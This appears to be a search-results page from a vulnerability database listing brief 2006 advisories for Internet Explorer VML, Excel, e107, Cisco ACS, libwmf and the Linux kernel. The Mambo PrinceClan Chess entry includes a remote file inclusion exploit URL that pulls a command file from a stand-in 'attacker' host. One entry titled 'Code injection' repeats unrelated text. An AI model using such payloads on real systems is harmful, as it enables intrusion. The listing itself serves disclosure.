8147 matches found
Internet Explorer VML rect fill buffer overflow
Added: 09/20/2006 CVE: CVE-2006-4868 BID: 20096 OSVDB: 28946 Background Vector Markup Language VML is an XML-based format for vector graphics. Problem A buffer overflow in Internet Explorer when processing VML code allows remote command execution using a long fill parameter within a rect tag...
Internet Explorer VML rect fill buffer overflow
Added: 09/20/2006 CVE: CVE-2006-4868 BID: 20096 OSVDB: 28946 Background Vector Markup Language VML is an XML-based format for vector graphics. Problem A buffer overflow in Internet Explorer when processing VML code allows remote command execution using a long fill parameter within a rect tag...
CVE-2006-4868
Stack-based buffer overflow in the Vector Graphics Rendering engine vgx.dll, as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language VML file with a long fill parameter...
CVE-2006-4868
CVE-2006-4868: A stack-based buffer overflow in VGX.dll (VML processing) used by Microsoft Outlook and Internet Explorer on Windows XP SP2 enables remote code execution via a crafted VML rect tag with a long fill parameter. Affected: Internet Explorer/VML handling. Impact per sources: arbitrary c...
e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting
source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may levearge this issue to have arbitrary script code execute in the browser of an unsuspecting user i...
Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion
pcchess Component - dork : index.php?option=compcchess - exploit : http://target/path/components/compcchess/include.pcchess.php?mosConfigabsolutepath=http://attacker/cmd.txt?&cmd=ls milw0rm.com 2006-07-24...
RHEL 4 : libwmf (RHSA-2006:0597)
Updated libwmf packages that fix a security flaw are now available for Red Hat Enterprise Linux 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Libwmf is a library for reading and converting Windows MetaFile vector graphics WMF. Libwmf is us...
security flaw
Buffer overflow in the xcfloadvector function in app/xcf/xcf-load.c for gimp before 2.2.12 allows user-assisted attackers to cause a denial of service crash and possibly execute arbitrary code via an XCF file with a large numaxes value in the VECTORS property...
Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation
/ $Id: raptorprctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ raptorprctl2.c - Linux 2.6.x suiddumpable2 logrotate Copyright c 2006 Marco Ivaldi The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of...
Microsoft Excel COLINFO Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...
Microsoft Excel OBJECT Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...
Microsoft Excel LABEL Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Offic...
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of...
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users. A proof-of-concept malicious code named 'Trojan.Hongmosa' is...
libwmf integer/heap overflow
Sorry I don't have time to chase down multiple email addresses of alleged developers; so here this is after weeks of no response. POC is not attached unlike advisory says. It's not very difficult to exploit. ++++++++++++++++++++++++++++++++++++++++++++ Subject: libwmf integer/heap overflow...
Directory traversal
Unspecified vulnerability in pinball 0.3.1 allows local users to gain privileges via unknown attack vectors that cause pinball to load plugins from an attacker-controlled directory while operating at raised privileges...
Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting
Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting source: https://www.securityfocus.com/bid/18449/info Cisco Secure ACS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage...
Windows Software Restriction Policy Protection Bypass
Windows Software Restriction Policy Protection Bypass Class: Protection bypass Vector: Local Tested on: Windows XP SP2, Windows Server 2003 SP1 Risk: Low Remark: I don't know, what is it - bug or feature, but I can't find any documentation on this issue. Description: Software Restriction Policies...
CVE-2006-2711
Secure Elements Class 5 AVR aka C5 EVM 2.8.1 and earlier, and possibly later 2.8.x releases, uses the same initialization vector and key for each message session, which allows remote attackers to obtain potentially sensitive information about messages...
Code injection
Secure Elements Class 5 AVR aka C5 EVM 2.8.1 and earlier, and possibly later 2.8.x releases, uses the same initialization vector and key for each message session, which allows remote attackers to obtain potentially sensitive information about messages...